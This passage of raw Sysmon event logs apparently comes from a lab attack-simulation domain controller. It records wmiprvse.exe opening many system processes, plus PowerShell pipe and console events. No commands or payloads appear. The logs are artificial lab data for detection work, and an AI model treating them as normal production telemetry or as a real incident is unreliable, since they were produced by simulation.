Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242907Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242906Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242905Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.273{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242904Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.272{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242903Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.271{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242902Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.270{05ADC7E1-229F-6039-1600-00000000AD01}154010492C:\Windows\system32\svchost.exe{05ADC7E1-6DD3-603E-DBAA-00000000AD01}16244C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242901Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.270{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6DD3-603E-DBAA-00000000AD01}16244C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002242900Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.269{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=7E51266C0A10E9BD94E64F2AD12DF8DC,SHA256=F435CE1A794655B59AB2A9E3D275DE2728F3ACAE25106305F0779915414A02FF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002242899Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.269{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242898Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.268{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242897Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.267{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242896Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.267{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242895Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.266{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242894Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.265{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242893Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.265{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242892Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.264{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 17141700x80000000000000002242891Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:54:43.248{05ADC7E1-6DD3-603E-D8AA-00000000AD01}14280\PSHost.132591776831204327.14280.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000002242890Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.248{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242889Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.248{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242888Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.248{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242887Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.248{05ADC7E1-6DD3-603E-DBAA-00000000AD01}162448128C:\Windows\system32\conhost.exe{05ADC7E1-6DD3-603E-DAAA-00000000AD01}13472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242886Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.248{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242885Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 